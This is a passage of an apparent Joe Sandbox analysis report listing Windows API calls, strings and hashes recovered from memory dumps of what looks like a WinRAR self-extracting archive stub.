                                                    • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00423038
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: IsProcessorFeaturePresent$KERNEL32
                                                    • API String ID: 1646373207-3105848591
                                                    • Opcode ID: d1a69543e5d9c137391ec359d69e443d87eeccf18cec78cee5d5aadc997909ac
                                                    • Instruction ID: d3258f4f80339163e2672f19ba2f23ecad20ea455fb9b5657f83571220678a16
                                                    • Opcode Fuzzy Hash: d1a69543e5d9c137391ec359d69e443d87eeccf18cec78cee5d5aadc997909ac
                                                    • Instruction Fuzzy Hash: 4FF09020B00A1AE2DB101FA1BC0A76F7B74FB80B42FD20091D2D2B0094CF3881B2C39A
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: ClassCursorLoadRegister
                                                    • String ID: 0$RarHtmlClassName
                                                    • API String ID: 1693014935-3342523147
                                                    • Opcode ID: cffd64fa36fabc92e5a0d46448ee1112acf1deea6d5ced85c9bd34b50614c114
                                                    • Instruction ID: 6468d3b39715e9384239594dfab13d89985d623456a05aa65b4c1771c327240d
                                                    • Opcode Fuzzy Hash: cffd64fa36fabc92e5a0d46448ee1112acf1deea6d5ced85c9bd34b50614c114
                                                    • Instruction Fuzzy Hash: B3F0C9B1D01218EBDB019F9AD844ADEFBF8FF59744F10805BE510B7250D7B516058FA9
                                                    APIs
                                                    • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0040D301
                                                    • SetEnvironmentVariableW.KERNEL32(sfxpar,00000002,00000000,00000000,?,?,00000400), ref: 0040D334
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentVariable
                                                    • String ID: sfxcmd$sfxpar
                                                    • API String ID: 1431749950-3493335439
                                                    • Opcode ID: a8140f58090634511f44161ca886cab68263d6ea0c61b5af6c353b9493b3caa2
                                                    • Instruction ID: cb44b0659a4409d4af72c0adb50c44061fc427c74c1d7ff7af2484f3202a1d71
                                                    • Opcode Fuzzy Hash: a8140f58090634511f44161ca886cab68263d6ea0c61b5af6c353b9493b3caa2
                                                    • Instruction Fuzzy Hash: 19E0EC36D0011436CA107AD69C06FA67B6CDFC0740F104037BE40A2080EAB898968AEB
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(kernel32,0040FB4C,00000001), ref: 00410A2E
                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00410A3E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: SetDllDirectoryW$kernel32
                                                    • API String ID: 1646373207-2052158636
                                                    • Opcode ID: 9877b7f07c448c74edacd698665b6da4c9425930a3fdfe75b90a4a82f5660a07
                                                    • Instruction ID: 2a2e48f0206e7cda530a18f1d439dd53cb4355a312b8357b8cda9b89cfe3aa0e
                                                    • Opcode Fuzzy Hash: 9877b7f07c448c74edacd698665b6da4c9425930a3fdfe75b90a4a82f5660a07
                                                    • Instruction Fuzzy Hash: 76D0A7B03003215B4B1C0F315C29F272698AF60F82354913E7E06D0080CE6CC060A12F
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,?,?,004072FA,?,?,?), ref: 00408F55
                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,004072FA,?,?,?,?), ref: 00408F8C
                                                    • SetFileTime.KERNEL32(?,00000000,00000000,00000000,?,004072FA,?,?,?,?), ref: 00408FFD
                                                    • CloseHandle.KERNEL32(?,?,004072FA,?,?,?,?), ref: 00409006
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: File$Create$CloseHandleTime
                                                    • String ID:
                                                    • API String ID: 2287278272-0
                                                    • Opcode ID: 724da5ab31416fc8e17f86cad73d2ccd851105d03da6f6afad9dba9d57fea368
                                                    • Instruction ID: e555192889b31e85495df2b5ecf33e75b86025a05627dc537a7d8560313cfda0
                                                    • Opcode Fuzzy Hash: 724da5ab31416fc8e17f86cad73d2ccd851105d03da6f6afad9dba9d57fea368
                                                    • Instruction Fuzzy Hash: E441AD31900259AEDF11CBA4CD45FEE7BB8AF05314F0440AAF491B72D2CA789E85CB64
                                                    APIs
                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00424BC2
                                                    • __isleadbyte_l.LIBCMT ref: 00424BF6
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,0041A53A,?,00000000,00000000,?,?,?,?,0041A53A,00000000,?), ref: 00424C27
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,0041A53A,00000001,00000000,00000000,?,?,?,?,0041A53A,00000000,?), ref: 00424C95
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                    • String ID:
                                                    • API String ID: 3058430110-0
                                                    • Opcode ID: 81987982e1df4478a7ec8bedb2574ddd47b8dcc3746f19ef86f9e98bcee9ea73
                                                    • Instruction ID: d407e8e23266a15625d843eb749e4930819c0c9e03748901522efcf66a79c496
                                                    • Opcode Fuzzy Hash: 81987982e1df4478a7ec8bedb2574ddd47b8dcc3746f19ef86f9e98bcee9ea73
                                                    • Instruction Fuzzy Hash: 20310431B01265EFCF20DF68D840AAE3FA4EF41310F9544AAE8619B291D334DE40CB59
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: _memset$H_prolog_malloc
                                                    • String ID:
                                                    • API String ID: 1600808285-0
                                                    • Opcode ID: dfdc19bc137521354847444799fb61c32f29d72c6aaeb966fb91c866f50d4e63
                                                    • Instruction ID: 35b3ddfec5c8ddf8780acfa7a8e9d41188ab76d8c4cac51afa7e8ecc18e19c1a
                                                    • Opcode Fuzzy Hash: dfdc19bc137521354847444799fb61c32f29d72c6aaeb966fb91c866f50d4e63
                                                    • Instruction Fuzzy Hash: 133108B1E00216ABDB149FA5C8417EBB2A8EF14319F10013FE101E7281D7B89E80CBED
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: _memset
                                                    • String ID:
                                                    • API String ID: 2102423945-0
                                                    • Opcode ID: 9d5df03678e0c5d5763a2dcc2e55ed97e5158c9e5106f151ba223aa709053554
                                                    • Instruction ID: 3bd7284e88047aa05f9e2904dd1288557c44a51b9be7d9e7a06902af27226689
                                                    • Opcode Fuzzy Hash: 9d5df03678e0c5d5763a2dcc2e55ed97e5158c9e5106f151ba223aa709053554
                                                    • Instruction Fuzzy Hash: 20118C71A447445DE230D77A8C45FD7F2CC9B15308F44882FB3EEC7182D5AA7454875A
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                    • String ID:
                                                    • API String ID: 3016257755-0
                                                    • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                    • Instruction ID: 0671bf020c610778da801b485fdcf7f9952a953c4e96ddcef4d1f141fbcd164b
                                                    • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                    • Instruction Fuzzy Hash: AC11903210015ABBCF125E84EE418EE3F32BB08354B898416FE1858130C6BBC9B2BB85
                                                    APIs
                                                      • Part of subcall function 0040C0B2: LoadStringW.USER32 ref: 0040C103
                                                      • Part of subcall function 0040C0B2: LoadStringW.USER32 ref: 0040C115
                                                    • _swprintf.LIBCMT ref: 0041163E
                                                      • Part of subcall function 00401B7B: __vswprintf_c_l.LIBCMT ref: 00401B8E
                                                    • GetLastError.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?), ref: 00411646
                                                    • MessageBoxW.USER32 ref: 00411668
                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 00411675
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastLoadString$Message__vswprintf_c_l_swprintf
                                                    • String ID:
                                                    • API String ID: 2205000856-0
                                                    • Opcode ID: 67094a9aa27c05f61b99f26d1da0b4bc76a919ccd275d9b0df56120526754fea
                                                    • Instruction ID: 9145d163c6f2193eddd2626d0ee9881a08dca4e6502684729794c941a0b659f5
                                                    • Opcode Fuzzy Hash: 67094a9aa27c05f61b99f26d1da0b4bc76a919ccd275d9b0df56120526754fea
                                                    • Instruction Fuzzy Hash: 5DF02B32500214BBF72177A08C46FCB375CAB15385F044177F901E60E2D67998758B7E
                                                    APIs
                                                    • __getptd.LIBCMT ref: 00421EDF
                                                      • Part of subcall function 0041E574: __getptd_noexit.LIBCMT ref: 0041E577
                                                      • Part of subcall function 0041E574: __amsg_exit.LIBCMT ref: 0041E584
                                                    • __getptd.LIBCMT ref: 00421EF6
                                                    • __amsg_exit.LIBCMT ref: 00421F04
                                                    • __lock.LIBCMT ref: 00421F14
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                    • String ID:
                                                    • API String ID: 3521780317-0
                                                    • Opcode ID: 9bbfce21fc56b317f6a36a82937c31e252a0bf44d043ae3dcf04175c47f93af7
                                                    • Instruction ID: d9405fda9bc9e752a47143f7e14e80d5593d74a137349638377a145df8a8a40d
                                                    • Opcode Fuzzy Hash: 9bbfce21fc56b317f6a36a82937c31e252a0bf44d043ae3dcf04175c47f93af7
                                                    • Instruction Fuzzy Hash: FBF06831F007109BD720FB66950278973A06F10755FD1012FE855572B1CB7CA942DE5D
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: _swprintf
                                                    • String ID: ;%u
                                                    • API String ID: 589789837-535004727
                                                    • Opcode ID: 3da00b9edbe83a003e410a14ed99af05545b81a56b3ce312bffc0a184933b4cc
                                                    • Instruction ID: 01cf00ea518033ca7b4007dbaca87e84521696031840c89cb653a4e5b8555c94
                                                    • Opcode Fuzzy Hash: 3da00b9edbe83a003e410a14ed99af05545b81a56b3ce312bffc0a184933b4cc
                                                    • Instruction Fuzzy Hash: 94D1D4702047498ADB38EB358649BEF77D9AF40304F14083FE856A72C2DBBCA885C759
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: _wcslen
                                                    • String ID: __rar_
                                                    • API String ID: 176396367-2561138058
                                                    • Opcode ID: 4d336d1affc06057673b0234350a02fef288ad40e246159464c0613795f817f6
                                                    • Instruction ID: 6a4a431c1e56d1c493be786a475568a8fecc6470f953a98c2c27572f7f48e8b2
                                                    • Opcode Fuzzy Hash: 4d336d1affc06057673b0234350a02fef288ad40e246159464c0613795f817f6
                                                    • Instruction Fuzzy Hash: F741E032A0425966DF21AE65CC84BEF37ADAF04354F04047BF809B7293D63CDD90CA68
                                                    APIs
                                                      • Part of subcall function 0040CBA9: LoadLibraryW.KERNEL32(Crypt32.dll,00000020,0040CC01,00000020,?,?,00405CD9,?,00000020,00000001,00000000,?,00000010,?,?,?), ref: 0040CBB7
                                                      • Part of subcall function 0040CBA9: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0040CBD0
                                                      • Part of subcall function 0040CBA9: GetProcAddress.KERNEL32(00437800,CryptUnprotectMemory), ref: 0040CBDC
                                                    • GetCurrentProcessId.KERNEL32(00000020,?,?,00405CD9,?,00000020,00000001,00000000,?,00000010,?,?,?,00000001,?,?), ref: 0040CC6F
                                                    Strings
                                                    • CryptProtectMemory failed, xrefs: 0040CC2F
                                                    • CryptUnprotectMemory failed, xrefs: 0040CC68
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$CurrentLibraryLoadProcess
                                                    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                    • API String ID: 137661620-396321323
                                                    • Opcode ID: a7536082de5730fe441caf6f3dfc1f6efdb8306066e4af88d8e8ecf7f82d8db2
                                                    • Instruction ID: 51533d20160d73d975f84f2b5b6479ab0bae40eb141f677a3a9346ce3b218a5c
                                                    • Opcode Fuzzy Hash: a7536082de5730fe441caf6f3dfc1f6efdb8306066e4af88d8e8ecf7f82d8db2
                                                    • Instruction Fuzzy Hash: 02112071308211ABEB19AF20ECD567F3755CB45B10B14423FF84AAB2C1CA3C9C86939D
                                                    APIs
                                                    • CreateThread.KERNEL32(00000000,00010000,00410DA8,?,00000000,?), ref: 00410E2A
                                                    • SetThreadPriority.KERNEL32(?,00000000,?,?,00410E96,-00000108,00404F9C), ref: 00410E71
                                                      • Part of subcall function 00406381: __vswprintf_c_l.LIBCMT ref: 0040639F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: Thread$CreatePriority__vswprintf_c_l
                                                    • String ID: CreateThread failed
                                                    • API String ID: 2655393344-3849766595
                                                    • Opcode ID: 6b26c6268f929c018fc4b191c811a9b7d2ee4e5fd23ea17b8fcf5990ae839919
                                                    • Instruction ID: d4f0eb2f7443d7b09686094e07eb9f8acc7c843fb6db64868415af7a66967b1e
                                                    • Opcode Fuzzy Hash: 6b26c6268f929c018fc4b191c811a9b7d2ee4e5fd23ea17b8fcf5990ae839919
                                                    • Instruction Fuzzy Hash: EB01F271344306BBD3202F56AC46BA77358EB04726F20043FFA86A2280DAF468918A2D
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: _wcschr_wcspbrk
                                                    • String ID: ?*<>|"
                                                    • API String ID: 3305141221-226352099
                                                    • Opcode ID: a882da7c2b875a8276cec26aa64494d63701d047f4c21e7081327baf51adad04
                                                    • Instruction ID: 7fc460efae3d9017256364a12bed320641fec45423bc778f8469a37c7f49cbc4
                                                    • Opcode Fuzzy Hash: a882da7c2b875a8276cec26aa64494d63701d047f4c21e7081327baf51adad04
                                                    • Instruction Fuzzy Hash: 83F0A42615432395DE2C662694016B363E89B19759B64847FF8C1F62C7EB7CDCC2C16C
                                                    APIs
                                                      • Part of subcall function 00419FA7: __getptd.LIBCMT ref: 00419FAD
                                                      • Part of subcall function 00419FA7: __getptd.LIBCMT ref: 00419FBD
                                                    • __getptd.LIBCMT ref: 0041DA7A
                                                      • Part of subcall function 0041E574: __getptd_noexit.LIBCMT ref: 0041E577
                                                      • Part of subcall function 0041E574: __amsg_exit.LIBCMT ref: 0041E584
                                                    • __getptd.LIBCMT ref: 0041DA88
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: __getptd$__amsg_exit__getptd_noexit
                                                    • String ID: csm
                                                    • API String ID: 803148776-1018135373
